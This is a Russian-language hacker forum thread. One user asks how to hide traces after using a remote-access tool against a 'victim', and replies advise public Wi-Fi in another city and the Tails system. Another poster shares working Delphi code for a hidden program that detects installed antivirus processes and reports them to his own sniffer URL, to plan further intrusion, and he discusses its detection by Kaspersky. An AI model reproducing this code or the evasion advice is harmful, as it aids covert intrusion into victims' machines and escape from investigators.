посоветуйте может-быть как после себя следы можно замести ?) хотя бы минимально)
Вот блин какой ты ленивый!Нужно не оставлять следов,чтобы их не заметать)Ну например,юзай свой РМС через халявный wi-fi в кафе (желательно в другом городе),использую к примеру такой специализированный дистрибутивчик как
Tails,а самое главное поменьше болтай.Люди вокруг очень "доброжелательны" и не важно откуда ты,из России или из Украины.Мировая интернет- паутина всех связывает воедино.
Не знаю как оснащена техническая сторона тех кто стал бы тебя ловить,но самая простая схема твоей "поимки":восстанавливают покрошенную тобой винду,находят билд РМС,изучают (тут всё зависит от спец подготовки),приходят к выводу что это детище какого-то генератора билдов,а именно BuilderRMS 5.6,ищут в сети информацию на эту тему,то есть гуглят)Просматривают посты на хак форумах...и тут опа!"Смотри Первый,тут на Русфере один пацанчик взломом очень интересовался (и про деньги заикался),давай его пробъём...ага и на хэппи-хаке,только ник у него там более "говорящий",глянь и на факаве тоже.Будем брать!".
Всё это шутка конечно,но в каждой шутке,как говорится, есть доля истины.
дело в том, что я почти ничего не знаю о своей жертве )
X-Shar, я тут подумал,а если написать прожку которая проверяет процессы в системе на наличие определённых,то есть антивирусных и если такой процесс имеется-отправляет мне,например на сниффер,данные,типа у "жертвы" стоит такой-то антивирь.Это значительно облегчит дальнейшую работу в плане подбора необходимых средств для проникновения. Или я велосипед изобретаю?
Во всяком случае,накидал несколько корявых строчек на делфи.Не знаю тока,что делать с формой,как-бы вес не имеет значения,да и антивири,как мне кажется больше доверяют прогам с окнами (а может это чушь).В общем тупо скрыл её.Далее использовал функцию :
function processExists(exeFileName: string): Boolean;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
Result := False;
while Integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
begin
Result := True;
end;
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
И потом только перебирал имена нужных мне процессов (к примеру для 4 антивирей):
procedure TForm1.FormCreate(Sender: TObject);//при создании форм происходит следующее
begin
Application.ShowMainForm:=False;//тупо скрываю форму
if processExists('op_mon.exe') then//проверяю есть ли процесс под именем op_mon.exe
IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:Outpost');//если есть,то отправляю название антивиря на сниффер
if processExists('ekrn.exe') then//итак далее для каждого процееса
IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:NOD');
if processExists('AVP.exe') then
IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:Kasper');
if processExists('MsMpEng.exe') then
IdHTTP1.Get('http://ссылка на мой сниффер?Antivirus:Защитник Виндовс');
Application.Terminate;//закрываюсь
end;
Ссори ещё раз за корявость,но я же только начинаю въезжать в этот дельфинарий.В итоге,Каспер залупнулся на мою прогу мол "Заблокирован переход по вредоносной ссылке" (не любит он видать сниФ на HPC).Прога выдала ошибку.НО!Данные пришли.
Прога выдала ошибку.НО!Данные пришли.Попробовал несколько раз,хоть каспер и блочит но его имя приходит мне.НОД промолчал,как и защитник виндовс.Оутпост присутствовал при компиляции,так что ему всё дозволено),хотя он спрашивал разрешение на соединение.
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Вопрос в том,стоит ли её допиливать или уже существует подобный софт?
p.s.Немного спиздел про Каспера.Всё работало,пока я не добавил проверку на Защитника Виндовс.После добавления поиска этого процесса,Каспер стал блокировать мою прогу как вредоносную.С чего бы это?
